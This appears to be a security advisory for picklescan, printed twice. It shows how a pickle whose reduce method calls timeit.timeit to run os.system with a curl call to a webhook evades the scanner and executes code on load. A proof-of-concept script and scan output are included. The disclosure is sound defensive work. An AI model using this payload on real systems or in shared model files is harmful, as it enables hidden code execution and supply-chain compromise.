Summary
Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file.
Details
Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like timeit.timeit(). And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to timeit.timeit() function from timeit library in reduce method
Then, inside reduce method, the attacker import dangerous libarary like os and calling os.system() to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
PoC
- The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()
import pickle
import timeit
class Payload(object):
def __reduce__(self):
return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')
def create_payload():
with open('payload.pickle', 'wb') as f:
pickle.dump(Payload(), f)
create_payload()
Then the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load()
2. The victim will use picklescan library to check out if the received pickle file is malicious or not
picklescan -p payload.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
- Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)
import pickle
def load_payload():
with open('payload.pickle', 'rb') as f:
pickle.load(f)
load_payload()
Impact
Severity: High
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Recommended Solution
I suggest adding timeit library to the unsafe globals blacklist.
References
Summary
Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file.
Details
Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like timeit.timeit(). And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to timeit.timeit() function from timeit library in reduce method
Then, inside reduce method, the attacker import dangerous libarary like os and calling os.system() to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
PoC
Then the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load()
2. The victim will use picklescan library to check out if the received pickle file is malicious or not
Impact
Severity: High
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Recommended Solution
I suggest adding timeit library to the unsafe globals blacklist.
References